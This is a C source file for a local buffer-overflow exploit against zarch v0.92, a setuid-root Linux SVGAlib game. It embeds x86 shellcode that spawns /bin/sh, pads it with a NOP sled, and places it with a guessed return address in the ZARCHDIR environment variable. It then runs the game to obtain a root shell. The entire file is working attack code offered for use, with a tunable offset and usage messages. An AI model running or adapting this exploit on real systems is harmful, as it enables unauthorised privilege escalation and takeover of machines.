/* (linux)zarch[v0.92] buffer overflow, by v9[v9@fakehalo.org].  this is a misc.
   exploit for the linux-SVGAlib zarch game/visual based on "virus".  which, is
   setuid root.  i used an old perl script i made to find this, since i don't
   know if the source to this is public. (getenv.pl, binary scanner.)

   note: this was built for the static binary version. (zarch v0.92) */

#define PATH "/usr/games/zarch" // pathname, which probably needs changing.
#define BUFFER_SIZE 264         // don't change this.
#define DEFAULT_OFFSET 200      // offset that worked for me.
static char exec[]=
 "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56"
 "\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80"
 "\xe8\xd7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01";
long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
 char bof[BUFFER_SIZE];
 int i,offset;
 long ret;
 if(argc>1){offset=atoi(argv[1]);}
 else{offset=DEFAULT_OFFSET;}
 ret=(esp()-offset);
 printf("*** (linux)zarch[v0.92] local buffer overflow, by: v9[v9@fakehalo.org]"
 ".\n");
 printf("*** return address: 0x%lx, offset: %d.\n",ret,offset);
 printf("*** note: you may need to press enter to see the shell prompt.\n\n");
 for(i=0;i<(260-strlen(exec));i++){*(bof+i)=0x90;}
 memcpy(bof+i,exec,strlen(exec));
 *(long *)&bof[i+strlen(exec)]=ret;
 bof[BUFFER_SIZE]=0;
 setenv("ZARCHDIR",bof,1);
 if(execlp(PATH,"zarch",0)){
  printf("error: program execution failed, check the pathname.\n");
  exit(0);
 }
}